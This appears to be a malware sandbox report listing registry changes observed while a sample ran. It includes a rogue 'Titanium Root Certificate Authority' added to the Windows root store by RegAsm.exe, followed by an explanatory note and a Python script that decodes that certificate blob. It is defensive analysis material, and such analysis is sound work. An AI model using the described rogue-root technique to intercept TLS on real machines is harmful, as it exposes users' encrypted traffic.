Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294935296" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\CLASSES\MIME\Database\Content Type\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/html C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell\runas\command C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\ = "ie_to_edge_bho.IEToEdgeBHO.1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\ = "IEToEdgeBHO Class" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ProgID\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\shell\open\command C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C9C2B807-7731-4F34-81B7-44FF7779522B}\1.0\0\win64\ = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\elevation_service.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{4A749F25-A9E2-4CBE-9859-CF7B15255E14} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationDescription = "Browse the web" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationIcon = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\msedge.exe,0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\DefaultIcon\ = "\"C:\\Program Files\\ProcessMonitor\\Procmon64.exe\",0" C:\Program Files\ProcessMonitor\Procmon64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\AppID = "{6d2b5079-2f0b-48dd-ab7f-97cec514d30b}" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\ = "Microsoft Edge HTML Document" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\shell\runas\ProgrammaticAccessOnly C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\open\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --single-argument %1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeMHT\shell\runas\command\ = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --do-not-de-elevate --single-argument %1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.htm C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\DisplayName = "PDF Preview Handler" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge\shell\open\command C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9C2B807-7731-4F34-81B7-44FF7779522B}\ = "Interface {C9C2B807-7731-4F34-81B7-44FF7779522B}" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3A84F9C2-6164-485C-A7D9-4B27F8AC009E}\InProcServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/pdf C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML\ = "ProcMon.Logfile.1" C:\Users\Admin\AppData\Local\Temp\Procmon64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.shtml\OpenWithProgids C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithProgIds\MSEdgeMHT C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\.PML C:\Program Files\sysint\Procmon64.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\System32\NOTEPAD.EXE N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell\runas C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\shell\runas\ProgrammaticAccessOnly C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\AppUserModelId = "MSEdge" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\AppUserModelId = "MSEdge" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\ProcMon.Logfile.1\DefaultIcon\ = "\"C:\\Users\\Admin\\Downloads\\ProcessMonitor\\Procmon64.exe\",0" C:\Users\Admin\Downloads\ProcessMonitor\Procmon64.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000010000000200000000000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Windows\System32\NOTEPAD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16 C:\Windows\System32\NOTEPAD.EXE N/A
Key created \REGISTRY\MACHINE\Software\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1 C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO.1\CLSID\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeMHT\shell\open C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\System32\NOTEPAD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask C:\Windows\system32\taskmgr.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
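The Blob write above is the one entry in this table that matters: RegAsm.exe, a .NET assembly-registration tool with no legitimate reason to touch the trust store, adds a certificate to the machine-wide ROOT store, and the key name is the certificate's SHA-1 thumbprint. The value is Windows' serialized certificate-context property list, a run of records (DWORD property ID, DWORD reserved, DWORD length, data) carrying the friendly name, a CRYPT_KEY_PROV_INFO link to a private-key container, the cached SHA-1 hash, and finally the DER certificate. Decoded, it is a self-signed CA "Titanium Root Certificate Authority" (serial 67f7beb96a4c2798, valid 2023-03-14 to 2026-06-17) with basicConstraints cA=TRUE and a serverAuth extended key usage, and the key-provider record names an RSA key container in the Microsoft Enhanced Cryptographic Provider, so the private key is on the host as well. A trusted root plus its private key is exactly what an implant needs to mint certificates for any site and intercept TLS. The script below is an added example, not sandbox or vendor code: it parses this blob with only the Python standard library, pulls out those fields, and verifies that the stored hash, SHA-1 of the DER and the registry key name all agree (a mismatch would mean a truncated dump or a tampered blob). The property IDs are the wincrypt.h constants; the parser assumes a well-formed blob and DER and is not hardened against malformed input.

```python
"""Decode the SystemCertificates 'Blob' that RegAsm.exe wrote and cross-check it against its key name.
Added example for this report, not sandbox or vendor code; standard library only, so it runs offline."""
import hashlib
import struct

PROP_KEY_PROV_INFO, PROP_SHA1_HASH, PROP_FRIENDLY_NAME, PROP_CERT = 2, 3, 11, 32   # wincrypt.h CERT_*_PROP_ID
OID_CN, OID_BASIC_CONSTRAINTS, OID_EXT_KEY_USAGE = b"\x55\x04\x03", b"\x55\x1d\x13", b"\x55\x1d\x25"
KEY_NAME = "F1A578C4CB5DE79A370893983FD4DA8B67B2B064"   # registry key name from the report

BLOB_HEX = (  # Blob value from the report, split at CERT_PROP record and ASN.1 field boundaries
    "0b000000" "01000000" "48000000"                                                 # friendly name, UTF-16LE
    "54006900740061006e00690075006d00200052006f006f0074002000430065007200740069006600"
    "69006300610074006500200041007500740068006f0072006900740079000000"
    "02000000" "01000000" "cc000000"                                                 # CRYPT_KEY_PROV_INFO
    "1c000000" "6c000000" "01000000" "00000000" "00000000" "00000000" "01000000"      # offsets, type, spec
    "7b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d00"
    "41003200310033002d004200410030004300450039003400340039003300380045007d0000000000"
    "4d006900630072006f0073006f0066007400200045006e00680061006e0063006500640020004300"
    "72007900700074006f0067007200610070006800690063002000500072006f007600690064006500"
    "72002000760031002e00300000000000"
    "03000000" "01000000" "14000000" "f1a578c4cb5de79a370893983fd4da8b67b2b064"       # cached SHA-1 hash
    "20000000" "01000000" "0a030000" "30820306" "308201ee" "a003020102"               # DER cert, tbs, v3
    "020867f7beb96a4c2798" "300d06092a864886f70d01010b0500"                          # serial, sigAlg
    "302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479"
    "301e" "170d3233303331343130333532305a" "170d3236303631373130333532305a"          # validity
    "302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479"
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100"             # RSA-2048 modulus:
    "86e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee" "881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713"
    "bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa0" "2998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b"
    "94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc4" "8479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a"
    "311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710" "abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c519"
    "0203010001" "a328302630130603551d25040c300a06082b06010505070301"                # e=65537, EKU serverAuth
    "300f0603551d130101ff040530030101ff" "300d06092a864886f70d01010b0500" "0382010100"  # cA=TRUE, sigAlg, sig:
    "70851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711" "560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c"
    "02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9" "526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8"
    "d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903ee" "e2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13a"
    "a8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781" "d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61"
)

def parse_blob(blob):
    """Walk CERT_PROP records: DWORD propId, DWORD reserved (always 1), DWORD cb, BYTE data[cb]."""
    props, off = {}, 0
    while off < len(blob):
        prop_id, _reserved, cb = struct.unpack_from("<III", blob, off)
        props[prop_id] = blob[off + 12:off + 12 + cb]
        off += 12 + cb
    return props

def der_tlv(buf, off):
    """Decode one DER tag and length at off -> (tag, value_start, value_end)."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:                                   # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, off, off + length

def der_children(buf, start, end):
    """Yield (tag, value_start, value_end) for each element inside a constructed value."""
    while start < end:
        tag, v_start, v_end = der_tlv(buf, start)
        yield tag, v_start, v_end
        start = v_end

def name_cn(buf, start, end):
    """commonName from an X.501 Name: SEQUENCE OF SET OF { OID, value }."""
    for _, set_s, set_e in der_children(buf, start, end):
        for _, atv_s, atv_e in der_children(buf, set_s, set_e):
            (_, oid_s, oid_e), (_, val_s, val_e) = der_children(buf, atv_s, atv_e)
            if buf[oid_s:oid_e] == OID_CN:
                return buf[val_s:val_e].decode("utf-8")

def summarize_cert(der):
    """Names, validity, CA flag and EKUs from a DER X.509 certificate."""
    _, tbs_s, tbs_e = der_tlv(der, der_tlv(der, 0)[1])          # Certificate -> tbsCertificate SEQUENCE
    fields = list(der_children(der, tbs_s, tbs_e))
    fields = fields[1:] if fields[0][0] == 0xA0 else fields     # skip explicit [0] version so indexes are stable
    (_, ser_s, ser_e), _alg, issuer, validity, subject, _spki = fields[:6]
    times = [der[s:e].decode("ascii") for _, s, e in der_children(der, *validity[1:])]
    info = {"cert_len": len(der), "serial": der[ser_s:ser_e].hex(), "not_before": times[0],
            "not_after": times[1], "issuer_cn": name_cn(der, *issuer[1:]),
            "subject_cn": name_cn(der, *subject[1:]), "is_ca": False, "eku": [],
            "self_signed": der[issuer[1]:issuer[2]] == der[subject[1]:subject[2]]}
    for tag, s, _ in fields[6:]:
        if tag != 0xA3:                                         # extensions are [3] EXPLICIT SEQUENCE OF Extension
            continue
        for _, ext_s, ext_e in der_children(der, *der_tlv(der, s)[1:]):
            parts = list(der_children(der, ext_s, ext_e))       # OID, optional critical BOOLEAN, OCTET STRING
            oid, value = der[parts[0][1]:parts[0][2]], der[parts[-1][1]:parts[-1][2]]
            inner = list(der_children(value, *der_tlv(value, 0)[1:]))
            if oid == OID_BASIC_CONSTRAINTS:                    # SEQUENCE { cA BOOLEAN DEFAULT FALSE, ... }
                info["is_ca"] = bool(inner) and inner[0][0] == 0x01 and value[inner[0][1]] != 0
            elif oid == OID_EXT_KEY_USAGE:                      # SEQUENCE OF OID; 2b06010505070301 = serverAuth
                info["eku"] = [value[a:b].hex() for _, a, b in inner]
    return info

def key_prov_info(raw):
    """CRYPT_KEY_PROV_INFO as serialized in the blob: its two pointer fields become offsets into the record."""
    cont_off, prov_off, prov_type, _flags, _n, _params, key_spec = struct.unpack_from("<7I", raw, 0)
    names = [raw[off:].decode("utf-16-le", "ignore").split("\x00", 1)[0] for off in (cont_off, prov_off)]
    return {"key_container": names[0], "key_provider": names[1],
            "prov_type": prov_type, "key_spec": key_spec}       # 1 = PROV_RSA_FULL, 1 = AT_KEYEXCHANGE

def analyze(blob_hex, key_name):
    """Decode the blob, summarize the cert, and check stored hash == SHA-1(DER) == registry key name."""
    props = parse_blob(bytes.fromhex(blob_hex))
    der = props[PROP_CERT]
    info = summarize_cert(der)
    info["friendly_name"] = props[PROP_FRIENDLY_NAME].decode("utf-16-le").rstrip("\x00")
    if PROP_KEY_PROV_INFO in props:                             # a key link means the private key is on this host
        info.update(key_prov_info(props[PROP_KEY_PROV_INFO]))
    info["stored_sha1"] = props[PROP_SHA1_HASH].hex().upper()
    info["computed_sha1"] = hashlib.sha1(der).hexdigest().upper()
    info["thumbprint_matches_key"] = info["stored_sha1"] == info["computed_sha1"] == key_name.upper()
    return info

if __name__ == "__main__":
    print(analyze(BLOB_HEX, KEY_NAME))
```

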